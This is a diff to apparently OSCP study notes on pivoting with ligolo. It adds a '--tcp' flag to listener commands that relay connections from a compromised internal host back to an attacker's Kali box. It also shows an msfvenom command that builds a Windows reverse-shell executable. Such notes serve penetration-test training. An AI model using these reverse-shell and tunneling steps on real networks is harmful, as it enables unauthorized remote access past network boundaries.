0xS4k0us4/OSCP-Tricks-2023/port_forwarding_and_tunneling.md

 So if we find ourselves in a situation where we have a pivot setup to the internal network, but the internal machine cant send back a shell to our attack box, we can use ligolo's TCP listeners to get our shell back on our kali box!

 # On the Ligolo proxy setup a listener
-listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:9001 # This will make it so that any connections sent to port 1234 on our agent back to our kali box on 9001, using this for reverse shell. listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:80 # This will make it so that any connections sent to port 8000 on our agent back to our kali box on 80, using this for transfer tools.
+listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:9001 --tcp # This will make it so that any connections sent to port 1234 on our agent back to our kali box on 9001, using this for reverse shell. listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:80 --tcp # This will make it so that any connections sent to port 8000 on our agent back to our kali box on 80, using this for transfer tools.

 # so if we need to get a shell back thru our pivot we would make a new payload that sends a shell to the Agent box on port 1234
 msfvenom -p windows/x64/shell_reverse_tcp -f exe -o revshell-1234.exe LHOST=client01-IP LPORT=1234